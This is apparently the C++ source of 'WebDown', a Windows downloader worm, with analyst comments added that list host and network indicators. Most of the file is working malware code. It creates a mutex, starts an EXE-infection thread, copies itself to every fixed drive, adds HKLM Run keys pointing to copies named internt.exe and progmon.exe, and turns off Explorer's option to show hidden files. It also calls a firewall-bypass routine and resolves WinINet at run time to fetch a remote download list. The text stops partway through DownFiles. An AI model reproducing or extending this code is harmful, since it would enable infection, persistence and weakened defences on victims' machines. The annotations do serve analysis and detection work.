// WebDown.cpp : Defines the entry point for the console application.
#include "stdafx.h"
#include "WebDown.h"
#include "worm.h"
#include <Dbt.h>
#pragma comment(lib,"LIBCTINY.LIB")//Create Mini Size
/////////////////////////////////////////////////////////////////////////////
// Configuration record for this sample: one URL, five feature switches and a
// polling interval. WinMain reads IsWorm, IsUpan and IsReg from it; IsShare,
// IsAnti and WaitTime are not referenced in the visible part of this file.
// NOTE(review): the name and the commented-out DecryptRecord() call in WinMain
// suggest the record is overwritten (and possibly encrypted) in the built
// binary — confirm against a sample. If so, this record is the place to
// extract the live download URL and enabled behaviours from.
struct MODIFY_DATA
{
char DownFile[100];// URL of the download list
bool IsWorm;// start by infecting EXE files (gates Worm_thread in WinMain)
bool IsReg;// start from the registry (gates Register() in WinMain)
bool IsUpan;// spread via USB drives (gates the drive-letter loop in WinMain)
bool IsShare;// spread via network shares
bool IsAnti;// resist anti-virus detection and removal
int WaitTime;// polling interval (minutes)
}modify_data =
{
// Defaults as they appear in source: a loopback URL, every switch off and a
// one-minute interval.
"http://127.0.0.1/down.list",
false,
false,
false,
false,
false,
1,
};
// Handle of the hidden message window; assigned in CreateMyWindow().
HWND hWnd;
// Two 8-character stamps plus terminator, both initialised to "88-88-88".
// The size matches the 8 bytes GetDownFileDate() reads from a URL.
// NOTE(review): presumably the previous and the latest stamp of the download
// list; the code that compares them is not on this page.
char DownFileDate1[9]="88-88-88";
char DownFileDate2[9]="88-88-88";
/* Data decryption function.
 *
 * Transforms nLen bytes at szRec in place with a repeating key: each byte has
 * the current key byte subtracted from it and is then XORed with that same key
 * byte. The key pointer returns to the start of szKey when it reaches the
 * terminating NUL.
 *
 * szRec  buffer to transform in place
 * nLen   number of bytes to transform
 * szKey  NUL-terminated key string
 *
 * The only call visible on this page is the commented-out one in WinMain,
 * which applies it to modify_data with the key "1314".
 * Analyst note: an empty key is not handled. The wrap test resets p to the
 * same NUL byte, and the p++ below then steps past the terminator.
 */
void DecryptRecord(char *szRec, unsigned long nLen, char *szKey)
{
unsigned long i;
char *p;
p = szKey;
for(i = 0; i < nLen; i++) {
// wrap to the first key byte once the terminator is reached
if(!(*p))
p = szKey;
// step 1: subtract the key byte; step 2: XOR with it, then advance both pointers
*szRec -= *p;
*szRec++ ^= *p++;
}
}
// Program entry point. In order: enforce a single instance through a named
// mutex, then run the behaviours selected in modify_data (infection thread,
// copy to drives, registry start-up), then call ByPassFireWall() and enter the
// hidden-window message loop in CreateMyWindow().
// The parameters are the standard WinMain ones; none of them is used.
// Returns nRetCode (always 0), and only after the message loop ends.
//
// Host indicator visible here: the mutex name "Alerter COM+". The same string
// is used as the hidden window's title and as the WinINet agent string in
// GetDownFileDate().
// Worm_thread, CopyToUAndSet and ByPassFireWall are not defined on this page.
int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
int nRetCode = 0;
// The block below is commented out in the source, so this build does not
// execute it. It shows the intended install path (<system dir>\IME\svchost.exe)
// and the decryption of modify_data with the key "1314".
/*
/// self-copy----------------------
char SysDirBuff[256];
char filename[256];
char This_File[256];
::GetSystemDirectory(SysDirBuff,sizeof(SysDirBuff));
strcpy(filename,SysDirBuff);
strcat(filename,"\\IME\\svchost.exe");
GetModuleFileName(NULL, This_File, sizeof(This_File));
if (_stricmp(This_File,filename)!=0)
{
DeleteFile(filename);
if(::CopyFile(This_File,filename,FALSE)==0) return -1;
SetFileAttrib(filename);// once hidden it cannot be copied??
}
DecryptRecord((char*)&modify_data,sizeof(MODIFY_DATA),"1314");
*/
// Create the mutex-----------------------------------
HANDLE m_hMutex=CreateMutex(NULL,FALSE,"Alerter COM+");
// Check the error code
if(GetLastError()==ERROR_ALREADY_EXISTS)
{
// The mutex already exists: release the handle and reset the variable
CloseHandle(m_hMutex);
m_hMutex=NULL;
// Exit the program
ExitProcess(0);
}
// Start the infection thread (start-up by infecting executables)----------------------------
if (modify_data.IsWorm)// thread handle is discarded
{
::CreateThread(NULL,0,Worm_thread,NULL,0,NULL);
}
// Copy the file to each drive
if(modify_data.IsUpan)
{// Walk drive letters C to Z and infect each disk.
// Analyst note: the switch is named for USB drives, but the test below
// selects DRIVE_FIXED volumes only.
for (char cLabel='c'; cLabel<='z'; cLabel++)
{
char strRootPath[] = {"c:\\"};
strRootPath[0] = cLabel;
if(GetDriveType(strRootPath)== DRIVE_FIXED)
{
CopyToUAndSet(strRootPath);
}
}
}
// Set up the registry
if (modify_data.IsReg)
{
Register();
}
// These two calls are unconditional. ByPassFireWall() is defined elsewhere;
// NOTE(review): its name suggests host-firewall tampering — confirm in its source.
ByPassFireWall();
// Does not return until the message loop in CreateMyWindow() ends.
CreateMyWindow();
return nRetCode;
}
/************************************************/
// Registers the window class "WebDown", creates a top-level window titled
// "Alerter COM+", hides it, and pumps messages for the calling thread until
// GetMessage returns 0. Always returns 1.
//
// The window exists only to receive messages: it is hidden straight after
// creation, and WndProc (not defined on this page) handles what arrives.
// Detection note: the class name / title pair, together with the mutex of the
// same name, identifies a running instance.
// The results of RegisterClass and CreateWindow are not checked.
int CreateMyWindow()
{
MSG msg;
WNDCLASS wndc;
LPSTR szAppName="WebDown";
// every WNDCLASS field is assigned explicitly; the struct is not zeroed first
wndc.style=0;
wndc.lpfnWndProc=WndProc;
wndc.cbClsExtra=0;
wndc.cbWndExtra=0;
wndc.hInstance=NULL;
wndc.hIcon=NULL;
wndc.hCursor=NULL;
wndc.hbrBackground=(HBRUSH)(COLOR_WINDOW+1);
wndc.lpszMenuName=NULL;
wndc.lpszClassName=szAppName;
RegisterClass(&wndc);
hWnd=CreateWindow(szAppName,"Alerter COM+",
WS_OVERLAPPEDWINDOW,
CW_USEDEFAULT,CW_USEDEFAULT,
CW_USEDEFAULT,CW_USEDEFAULT,
NULL,NULL,NULL,NULL);
ShowWindow(hWnd,SW_HIDE);
UpdateWindow(hWnd);
// Send one WM_DEVICECHANGE with zero parameters to the window itself.
// Original comment: check whether there is a device-inserted message.
// NOTE(review): presumably this makes WndProc look at devices that were
// attached before start-up — confirm in WndProc.
SendMessage(hWnd,WM_DEVICECHANGE,0,0);
while(GetMessage(&msg,NULL,0,0))
{
TranslateMessage(&msg);
DispatchMessage(&msg);
}
return 1;
}
// Installs registry-based start-up for this executable and changes an Explorer
// hidden-files setting. Returns TRUE when both registry keys could be opened
// and FALSE when either open fails. No other API result is checked, so TRUE
// does not mean the copies or the value writes succeeded.
//
// Host artefacts written by this function (all taken from the code below):
//   files     <system dir>\internt.exe and <system dir>\progmon.exe
//   Run key   HKLM\Software\Microsoft\Windows\CurrentVersion\Run
//             values "Internt" and "Program file" (ATT&CK T1547.001)
//   setting   HKLM\...\Explorer\Advanced\Folder\Hidden\SHOWALL
//             "CheckedValue" = 0 (REG_DWORD)
// Forensic detail: both Run values are written with cbData = MAX_PATH instead
// of the string length. The stored data is therefore 260 bytes: the path, its
// terminator, then whatever the stack buffer held after it.
// Both writes target HKLM, so they need write access to that hive.
BOOL Register()
{
long ret = 0;
HKEY hKEY;
char chCurPath[MAX_PATH];
char chSysPath[MAX_PATH];
char lpNewFileName1[MAX_PATH];
char lpNewFileName2[MAX_PATH];
LPSTR lpCurFileName;
DWORD dwType = REG_SZ;
DWORD dwSize = MAX_PATH;
char lpRegPath[256] = "Software\\Microsoft\\Windows\\CurrentVersion\\Run";
::GetSystemDirectory(chSysPath, dwSize);
::GetModuleFileName(NULL, chCurPath, dwSize);
// Copy the file
lpCurFileName = chCurPath;
sprintf(lpNewFileName1, "%s\\internt.exe", chSysPath);
// SetFileAttrib is defined elsewhere. Here it receives the system directory
// path, not the path of the copy about to be made.
SetFileAttrib(chSysPath);
ret = CopyFile(lpCurFileName, lpNewFileName1, FALSE);
sprintf(lpNewFileName2, "%s\\progmon.exe", chSysPath);
SetFileAttrib(chSysPath);
ret = CopyFile(lpCurFileName, lpNewFileName2, FALSE);
// Open the registry key
ret = RegOpenKeyEx(HKEY_LOCAL_MACHINE, lpRegPath, 0, KEY_WRITE, &hKEY);
if(ret != ERROR_SUCCESS)
{
// hKEY was never assigned when the open fails; this closes an uninitialised handle
RegCloseKey(hKEY);
return FALSE;
}
// Set the registry values
ret = RegSetValueEx(hKEY, "Internt", NULL, dwType,
(const unsigned char*)lpNewFileName1, dwSize);
ret = RegSetValueEx(hKEY, "Program file", NULL, dwType,
(const unsigned char*)lpNewFileName2, dwSize);
RegCloseKey(hKEY);
//-----------------------
// Second change: force CheckedValue to 0 under the SHOWALL option.
// NOTE(review): this value belongs to Explorer's "show hidden files"
// option, and zeroing it is associated with keeping hidden files out of
// view. Confirm the effect on the Windows versions of interest.
DWORD dwData=0x00000000;
char lpRegPath2[256] = "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL";
ret=RegOpenKeyEx(HKEY_LOCAL_MACHINE,lpRegPath2,0,KEY_READ|KEY_WRITE,&hKEY);
if(ret != ERROR_SUCCESS)
{
// same pattern as above: hKEY holds the already-closed Run key handle here
RegCloseKey(hKEY);
return FALSE;
}
RegSetValueEx(hKEY,"CheckedValue",0,REG_DWORD,(LPBYTE)&dwData,sizeof(DWORD));
RegCloseKey(hKEY);
return TRUE;
}
///************************************************
// Fetches the first 8 bytes of the resource at Url and copies them, as a
// NUL-terminated string, into Date.
//
// Url   URL to open, passed unchanged to InternetOpenUrlA
// Date  output buffer; must hold at least 9 bytes (8 read + terminator)
// Returns false only when wininet.dll cannot be loaded. It returns true in
// every other case, including when the connection or the read fails.
//
// The four WinINet functions are resolved at run time with
// LoadLibrary/GetProcAddress rather than called through a linked import.
// NOTE(review): this usually keeps them out of the import table — verify on a
// built sample.
// Network indicator: the agent string passed to InternetOpenA is "Alerter COM+".
// Analyst notes: the GetProcAddress results are not checked. buf is zeroed
// only after the URL opens, so when InternetOpen or InternetOpenUrl fails the
// strcpy below copies an uninitialised stack buffer into Date.
bool GetDownFileDate(char Url[],char Date[])
{
HMODULE hDll;
LPVOID hInternet,hUrlHandle;
char buf[9];
DWORD dwFlags;
hDll = LoadLibrary("wininet.dll");
if(hDll)
{
// local function-pointer types mirroring the WinINet prototypes
typedef LPVOID ( WINAPI * pInternetOpen ) (LPCTSTR ,DWORD ,LPCTSTR ,LPCTSTR ,DWORD );
typedef LPVOID ( WINAPI * pInternetOpenUrl ) ( LPVOID ,LPCTSTR ,LPCTSTR ,DWORD ,DWORD ,DWORD);
typedef BOOL ( WINAPI * pInternetCloseHandle ) ( LPVOID );
typedef BOOL ( WINAPI * pInternetReadFile ) (LPVOID ,LPVOID ,DWORD ,LPDWORD) ;
pInternetOpen InternetOpen=NULL;
pInternetOpenUrl InternetOpenUrl=NULL;
pInternetCloseHandle InternetCloseHandle=NULL;
pInternetReadFile InternetReadFile=NULL;
InternetOpen = ( pInternetOpen ) GetProcAddress( hDll, "InternetOpenA" );
InternetOpenUrl = (pInternetOpenUrl ) GetProcAddress ( hDll, "InternetOpenUrlA");
InternetCloseHandle = (pInternetCloseHandle) GetProcAddress (hDll,"InternetCloseHandle");
InternetReadFile = (pInternetReadFile) GetProcAddress(hDll,"InternetReadFile");
hInternet = InternetOpen("Alerter COM+",0, NULL, NULL, 0);
if (hInternet != NULL)
{
// 0x04000000 is INTERNET_FLAG_NO_CACHE_WRITE: the response is not written to the cache
hUrlHandle = InternetOpenUrl(hInternet, Url, NULL, 0, 0x04000000, 0);
if (hUrlHandle!= NULL)
{
memset(buf,0,9);
// reads at most 8 bytes; dwFlags receives the byte count and is not examined
InternetReadFile(hUrlHandle, buf,8, &dwFlags);
InternetCloseHandle(hUrlHandle);
hUrlHandle = NULL;
}
InternetCloseHandle(hInternet);
hInternet = NULL;
}
FreeLibrary(hDll);
strcpy(Date,buf);
return true;
}
else
return false;
}
void DownFiles(char Url[])
{
HMODULE hDll;
LPVOID hInternet,hUrlHandle;
char buf[100],test[101];
DWORD dwFlags,dwSize;
hDll = LoadLibrary("wininet.dll");
if(hDll)
{
typedef LPVOID ( WINAPI * pInternetOpen ) (LPCTSTR ,DWORD ,LPCTSTR ,LPCTSTR ,DWORD );
typedef LPVOID ( WINAPI * pInternetOpenUrl ) ( LPVOID ,LPCTSTR ,LPCTSTR ,DWORD ,DWORD ,DWORD);
typedef BOOL ( WINAPI * pInternetCloseHandle ) ( LPVOID );
typedef BOOL ( WINAPI * pInternetReadFile ) (LPVOID ,LPVOID ,DWORD ,LPDWORD) ;
pInternetOpen InternetOpen=NULL;
pInternetOpenUrl InternetOpenUrl=NULL;
pInternetCloseHandle InternetCloseHandle=NULL;
pInternetReadFile InternetReadFile=NULL;
InternetOpen = ( pInternetOpen ) GetProcAddress( hDll, "InternetOpenA" );
InternetOpenUrl = (pInternetOpenUrl ) GetProcAddress ( hDll, "InternetOpenUrlA");
InternetCloseHandle = (pInternetCloseHandle) GetProcAddress (hDll,"InternetCloseHandle");
InternetReadFile = (pInternetReadFile) GetProcAddress(hDll,"InternetReadFile");
hInternet = InternetOpen("Alerter COM+",0, NULL, NULL, 0);